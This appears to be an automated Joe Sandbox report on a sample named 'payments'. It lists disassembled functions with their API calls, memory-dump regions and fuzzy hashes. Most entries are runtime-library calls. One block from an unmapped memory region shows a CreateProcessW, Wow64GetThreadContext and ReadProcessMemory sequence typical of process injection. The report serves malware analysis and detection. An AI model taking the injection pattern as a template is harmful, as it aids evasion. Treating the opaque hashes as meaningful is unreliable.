                                                                                                                            • Part of subcall function 00CB1C9D: GetLastError.KERNEL32(00000000,?,00CB7A85), ref: 00CB1CC3
                                                                                                                          • _free.LIBCMT ref: 00CDBB83
                                                                                                                          • _free.LIBCMT ref: 00CDBB95
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                                                          • Instruction ID: 5115ecf3dc1c8b1b7b9ece648a89d95c9531fdee2675c8a1d8dc0c6d31128897
                                                                                                                          • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                                                          • Instruction Fuzzy Hash: 3FE0C2A120070093CA2065386E44EF317CC0F04391B08080FB92AE3242CF20EC4098A4
                                                                                                                          APIs
                                                                                                                          • _strcat.LIBCMT ref: 00CF08FD
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • _wcscpy.LIBCMT ref: 00CF098C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1012013722-0
                                                                                                                          • Opcode ID: 80c4f9e9e25515716c4884b7276b90a5c4e9d45fcb6463e6a75b9d7d75c227d2
                                                                                                                          • Instruction ID: 414208a472323b8e71ec9e7a79f7435ba507cf44c2a7b94fac64f4aedc522d90
                                                                                                                          • Opcode Fuzzy Hash: 80c4f9e9e25515716c4884b7276b90a5c4e9d45fcb6463e6a75b9d7d75c227d2
                                                                                                                          • Instruction Fuzzy Hash: 18915B34A00605DFCB58DF28C4959A9B7E5FF49710B61806EE91A8F3A2DB31ED41DB81
                                                                                                                          APIs
                                                                                                                          • ___lock_fhandle.LIBCMT ref: 00CBEA29
                                                                                                                          • __close_nolock.LIBCMT ref: 00CBEA42
                                                                                                                            • Part of subcall function 00CB7BDA: __getptd_noexit.LIBCMT ref: 00CB7BDA
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1046115767-0
                                                                                                                          • Opcode ID: ca784072a1f7f5eaa78cf92f44d6074397ffbe276fe779ea258f6685489e2422
                                                                                                                          • Instruction ID: 4e816f61048ebe983914eb9db7f177495d894ca317fd5d387342975a1c6affd7
                                                                                                                          • Opcode Fuzzy Hash: ca784072a1f7f5eaa78cf92f44d6074397ffbe276fe779ea258f6685489e2422
                                                                                                                          • Instruction Fuzzy Hash: 7011A9729057108FD711BF64C8413D87E656F81B32F264344E8745F1E2C7B89D41BBA5
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CB395C: __FF_MSGBANNER.LIBCMT ref: 00CB3973
                                                                                                                            • Part of subcall function 00CB395C: __NMSG_WRITE.LIBCMT ref: 00CB397A
                                                                                                                            • Part of subcall function 00CB395C: RtlAllocateHeap.NTDLL(00E70000,00000000,00000001,00000001,00000000,?,?,00CAF507,?,0000000E), ref: 00CB399F
                                                                                                                          • std::exception::exception.LIBCMT ref: 00CAF51E
                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00CAF533
                                                                                                                            • Part of subcall function 00CB6805: RaiseException.KERNEL32(?,?,0000000E,00D46A30,?,?,?,00CAF538,0000000E,00D46A30,?,00000001), ref: 00CB6856
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3902256705-0
                                                                                                                          • Opcode ID: 82bbc46419c36398c8fd2302a08e4a3f598b30583c362d2489df9cf3f4c38a89
                                                                                                                          • Instruction ID: 72b81ca4a4830e9136c44f84cc87bd12791ff0c3be204210b67ae4d9b5f16dc1
                                                                                                                          • Opcode Fuzzy Hash: 82bbc46419c36398c8fd2302a08e4a3f598b30583c362d2489df9cf3f4c38a89
                                                                                                                          • Instruction Fuzzy Hash: 05F0FF3140021EA7DB01FFD8E8029DEB7ACAF02358F604029F909A2181CFB0DB81A7B5
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          • __lock_file.LIBCMT ref: 00CB3629
                                                                                                                            • Part of subcall function 00CB4E1C: __lock.LIBCMT ref: 00CB4E3F
                                                                                                                          • __fclose_nolock.LIBCMT ref: 00CB3634
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2800547568-0
                                                                                                                          • Opcode ID: 4ea5487556a316f1bebe1d12d05e45ec4ea42009eca946774634557a8dd7c2a7
                                                                                                                          • Instruction ID: 6d8ef69a026156f1bd4365f979beac12341c5ef5f801db861147f0df98296097
                                                                                                                          • Opcode Fuzzy Hash: 4ea5487556a316f1bebe1d12d05e45ec4ea42009eca946774634557a8dd7c2a7
                                                                                                                          • Instruction Fuzzy Hash: 4EF0BB31881A44AAD7117B65C8067DE7BA07F41734F258108F421AB2C1C77CDB01BB55
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 010AC79B
                                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010AC831
                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010AC853
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1359173157.00000000010AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 010AA000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10aa000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2438371351-0
                                                                                                                          • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                          • Instruction ID: 5313fb45d6ef73604cdddfeeef18cb11648b53f949c7de140507d4ec689e4250
                                                                                                                          • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                          • Instruction Fuzzy Hash: D112DD20E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4E81CB5A
                                                                                                                          APIs
                                                                                                                          • __flush.LIBCMT ref: 00CB2A0B
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __flush__getptd_noexit
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4101623367-0
                                                                                                                          • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                          • Instruction ID: f941b59f7d999453c34fe8033b4ca8a604e28f92ff22ee78010fb9618f0d7771
                                                                                                                          • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                          • Instruction Fuzzy Hash: 9E419771B007069FDF288EA9C8915EE7BA6EF45361F24863DE869CB244D770DE41AB40
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 544645111-0
                                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                          • Instruction ID: 30bd52aea288e45cf569003362f0c12ff58bd01f9b9e6c14e6a9b51452db0235
                                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                          • Instruction Fuzzy Hash: D731C774A00106DBD718DF59C480969FBB6FF8A348B6486A9E419CB256DB31EEC1CBD0
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 269201875-0
                                                                                                                          • Opcode ID: 48052f822807b2d23ae8f828d4d35c74342fb52e01ada7d724d91ce89d96af4d
                                                                                                                          • Instruction ID: c7ae766c3436208516e3e393283fd98dab5e3c991d0be4e8b4b0bf84f416c902
                                                                                                                          • Opcode Fuzzy Hash: 48052f822807b2d23ae8f828d4d35c74342fb52e01ada7d724d91ce89d96af4d
                                                                                                                          • Instruction Fuzzy Hash: 7B31C035204528DFCF01AF05C49067EBBB0FF49724F21844AEA951B387EBB0A905DF86
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClearVariant
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1473721057-0
                                                                                                                          • Opcode ID: 383e6402487ec1f760728f2505824c7ab8c78ccafe3b6106da94ef202650e9aa
                                                                                                                          • Instruction ID: 0a0ee5f3aa24eed6f377f9916cb71ad6f1da7cc24131b46571739422b3a00d1f
                                                                                                                          • Opcode Fuzzy Hash: 383e6402487ec1f760728f2505824c7ab8c78ccafe3b6106da94ef202650e9aa
                                                                                                                          • Instruction Fuzzy Hash: 8C415F70904612CFDB24CF59C484B1ABBE1BF45358F29895CE99A4B362C372F846DF52
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C94214: FreeLibrary.KERNEL32(00000000,?), ref: 00C94247
                                                                                                                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C939FE,?,00000001), ref: 00C941DB
                                                                                                                            • Part of subcall function 00C94291: FreeLibrary.KERNEL32(00000000), ref: 00C942C4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Free$Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2391024519-0
                                                                                                                          • Opcode ID: 94617efc861c1dcdf96798a1768972d842e088d9ed07f304548c76c9a5f22d6c
                                                                                                                          • Instruction ID: a3ce3fe07ed151ab6a195d290442c1343fe0af18c672ac2459ca33597c5087a8
                                                                                                                          • Opcode Fuzzy Hash: 94617efc861c1dcdf96798a1768972d842e088d9ed07f304548c76c9a5f22d6c
                                                                                                                          • Instruction Fuzzy Hash: D711A731600706BADF18AB74DD0AF9E77A9AF40704F108429F996AA1C1DF70DA06AB60
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClearVariant
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1473721057-0
                                                                                                                          • Opcode ID: 58e241fc762ad5d369635a25a6afd619f9c2e6a4d3863f11320ab11b46550c9c
                                                                                                                          • Instruction ID: d8b7e8eed27b14563dac55f5209ad4a4b24126cff55d884f2ad0581e730d662d
                                                                                                                          • Opcode Fuzzy Hash: 58e241fc762ad5d369635a25a6afd619f9c2e6a4d3863f11320ab11b46550c9c
                                                                                                                          • Instruction Fuzzy Hash: 3B213B70504702CFDB24DF69C444B1ABBE1BF85348F24496CE59A47362C771E846DF52
                                                                                                                          APIs
                                                                                                                          • ___lock_fhandle.LIBCMT ref: 00CBAFC0
                                                                                                                            • Part of subcall function 00CB7BDA: __getptd_noexit.LIBCMT ref: 00CB7BDA
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1144279405-0
                                                                                                                          • Opcode ID: 6d4e514c83354a483b6b818d85c119a2124ed8b757b667e35e7b111abd6019e9
                                                                                                                          • Instruction ID: 7270a1a11c5c59efa4449a69a593b039a032a95670674370bc2d49556a8b1c33
                                                                                                                          • Opcode Fuzzy Hash: 6d4e514c83354a483b6b818d85c119a2124ed8b757b667e35e7b111abd6019e9
                                                                                                                          • Instruction Fuzzy Hash: 421194B28056109FD7127FA4D8467F97B61AF81332F194344E8745F1E2C7F48D00ABA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                                                          • Instruction ID: cb744774007cf1df854ceac61625842000cc8ca3e7f4519d5e7cc5f8b0ac4077
                                                                                                                          • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                                                          • Instruction Fuzzy Hash: 3801313150110AEECF05EFA5C896CFEBF74AF21344F54802AF566971A5EB309A49EB60
                                                                                                                          APIs
                                                                                                                          • __lock_file.LIBCMT ref: 00CB2AED
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __getptd_noexit__lock_file
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2597487223-0
                                                                                                                          • Opcode ID: 0c6c626840081f06da482adc3d7cd43a2c118e9d471821efb08eb36df0799dc2
                                                                                                                          • Instruction ID: 1c866558ea2f781eb582079c1b9f8dec2b8020ce93d07e0b9dc552899d8ec373
                                                                                                                          • Opcode Fuzzy Hash: 0c6c626840081f06da482adc3d7cd43a2c118e9d471821efb08eb36df0799dc2
                                                                                                                          • Instruction Fuzzy Hash: B3F06D31940205ABDF25BF65CC067DF3AA9BF40720F258515F8249A191DB78CA52FB51
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,00C939FE,?,00000001), ref: 00C94286
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 83037abaa16ef694370924b2879067b455f872556f4f6e8a0d6f7258ab243a4b
                                                                                                                          • Instruction ID: 74b702dc32b983e9a5e6779d49f205819362d221b6ecf4f6331c0c78861cabb6
                                                                                                                          • Opcode Fuzzy Hash: 83037abaa16ef694370924b2879067b455f872556f4f6e8a0d6f7258ab243a4b
                                                                                                                          • Instruction Fuzzy Hash: 02F0A970509B02DFCF388F60E888C12BBE0BF003253208A3EF1E682610C732A980DF50
                                                                                                                          APIs
                                                                                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C940C6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongNamePath
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 82841172-0
                                                                                                                          • Opcode ID: e6a925a5248b27997ee87a39191b3cf2c8b4fd857f0845fe101de8b599c68da8
                                                                                                                          • Instruction ID: 4c3402de5056e3ecc3e146d7a09722f77d8b696f87d383e2ef1ae0999230889e
                                                                                                                          • Opcode Fuzzy Hash: e6a925a5248b27997ee87a39191b3cf2c8b4fd857f0845fe101de8b599c68da8
                                                                                                                          • Instruction Fuzzy Hash: 81E0CD365003246BC7119658CC46FEA779DDF88690F054075F905D7344DE7499C19690
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 010ACFF1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1359173157.00000000010AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 010AA000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10aa000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3472027048-0
